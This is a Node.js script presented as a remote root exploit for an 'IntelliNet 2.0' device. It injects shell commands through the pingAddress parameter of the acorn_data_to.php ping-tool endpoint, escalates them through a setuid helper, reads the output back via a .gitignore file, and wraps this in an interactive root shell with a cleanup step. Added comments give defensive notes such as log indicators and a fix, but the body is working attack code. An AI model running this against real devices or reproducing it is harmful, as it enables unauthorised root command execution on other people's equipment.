#!/usr/local/bin/node
const { execSync } = require('child_process');
const readline = require('readline');
// Path of the helper binary that createShell() puts in front of every command
// it sends. The banner's "root" claim rests on this binary being setuid on the
// device (presumably, going by its name); nothing in this script verifies it.
const ESCALATE = '/usr/aes/bin/exec_suid';

// Mutable state shared by the readline callbacks below.
let TARGET = ''; // host typed at the first prompt; used verbatim in every URL
let SESSION = ''; // marker plus $HOSTNAME as read back from the first command
let COMMAND = ''; // most recent line typed at the interactive prompt
// Startup banner. The product name, version and "0-Day" label are the author's
// own description; the script carries no advisory or CVE identifier.
console.log(`
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀
⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀
⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀
⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀
⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
╔════════════════════════════════════════════╗
║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║
║ Author: Jean Pereira <info@cytres.com> ║
╚════════════════════════════════════════════╝
`);
/**
 * Ask the device to delete the `.gitignore` scratch file that createShell()
 * writes command output into.
 *
 * The request uses the same acorn_data_to.php ping-tool endpoint and the same
 * `127.0.0.1;` prefix in pingAddress, followed by `rm%20.gitignore;`. Unlike
 * createShell(), the command is not prefixed with ESCALATE.
 *
 * Review notes (defensive):
 * - In this file cleanUp() is reached only when the operator types `!q`. A
 *   session that ends any other way leaves `.gitignore`, holding the output of
 *   the last command, on the device; that file is an artifact to look for.
 * - The removal is itself one more logged request to acorn_data_to.php with a
 *   `;` inside pingAddress.
 */
const cleanUp = () => {
  const removeUrl = `http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;`;
  execSync(`curl -sL "${removeUrl}"`);
};
/**
 * Run one command on the device and return what it printed.
 *
 * Two local curl invocations are made:
 *   1. GET acorn_data_to.php?cmd=ping-tool with a pingAddress made of
 *      `127.0.0.1`, a `;`, the URL-encoded string "<ESCALATE> <cmd>", and an
 *      encoded ` > .gitignore` redirect.
 *   2. GET /.gitignore; its body is returned with surrounding whitespace
 *      trimmed.
 *
 * Review notes (defensive):
 * - This works only if the endpoint hands pingAddress to a shell without
 *   validating it. That is presumably what the device does; the server code is
 *   not on this page. Accepting nothing but a literal IP address or hostname
 *   and invoking ping with an argument vector would close it.
 * - Neither curl call sends a cookie, token or other credential.
 * - Log indicators: requests to acorn_data_to.php whose pingAddress contains
 *   `;` or `%3E`, each followed by a request for `/.gitignore`.
 * - TARGET is pasted into a string that the local shell parses; execFileSync
 *   with an argument array would keep curl's arguments out of shell parsing.
 *
 * @param {string} cmd - command text to run through ESCALATE on the device.
 * @returns {string} trimmed body of the `/.gitignore` response.
 */
const createShell = (cmd) => {
  const remoteCommand = encodeURIComponent([ESCALATE, cmd].join(' '));
  const writeUrl = `http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${remoteCommand}%20%3E%20.gitignore;`;
  execSync(`curl -sL "${writeUrl}"`);

  const readUrl = `http://${TARGET}/.gitignore`;
  const body = execSync(`curl -sL "${readUrl}"`);
  return body.toString().trim();
};
// Single readline interface on the terminal; both the target prompt and the
// interactive command prompt are asked through it.
const rl = readline.createInterface({ input: process.stdin, output: process.stdout });
/**
 * Prompt loop that forwards each typed line to createShell() and prints the
 * result.
 *
 * The prompt text is `root@<name>:~# `, where <name> is SESSION with its first
 * eight characters (the probe marker) removed. Typing `!q` runs cleanUp() and
 * closes the readline interface; any other line is stored in COMMAND, sent,
 * and the loop re-arms itself.
 *
 * Review note (defensive): every line typed here becomes one createShell()
 * call, i.e. one request to acorn_data_to.php followed by one request for
 * `/.gitignore`, so a session shows up in access logs as that pair repeating.
 */
const interactiveShell = () => {
  const prompt = `root@${SESSION.slice(8)}:~# `;
  rl.question(prompt, (line) => {
    if (line.trim() === '!q') {
      console.log('Cleaning up...');
      cleanUp();
      rl.close();
      return;
    }

    COMMAND = line;
    console.log(createShell(COMMAND));
    interactiveShell();
  });
};
// Entry point: read the target host, send one probe command, and start the
// prompt loop only if the probe's marker comes back.
//
// The probe is `echo a1b2c3d4$HOSTNAME` sent through createShell(); success is
// judged solely by the read-back text starting with `a1b2c3d4`. The "injected
// to firmware" wording below is the author's; what the visible code does is
// the createShell() request pair.
// NOTE(review): the failure branch exits with status 0, so a calling script
// cannot tell an aborted run from a clean one.
rl.question('[*] Enter target IP: ', (targetIP) => {
  TARGET = targetIP;
  SESSION = createShell('echo a1b2c3d4$HOSTNAME');

  const markerEchoed = SESSION.startsWith('a1b2c3d4');
  if (!markerEchoed) {
    console.log('[*] Could not execute payload, aborting');
    process.exit(0);
  }

  const statusLines = [
    '[*] Payload injected to firmware',
    '[*] Launching root shell via exec_suid',
    '',
  ];
  statusLines.forEach((text) => console.log(text));
  interactiveShell();
});
// Closing the readline interface (the `!q` path, or end of input) ends the
// process with status 0.
rl.on('close', () => process.exit(0));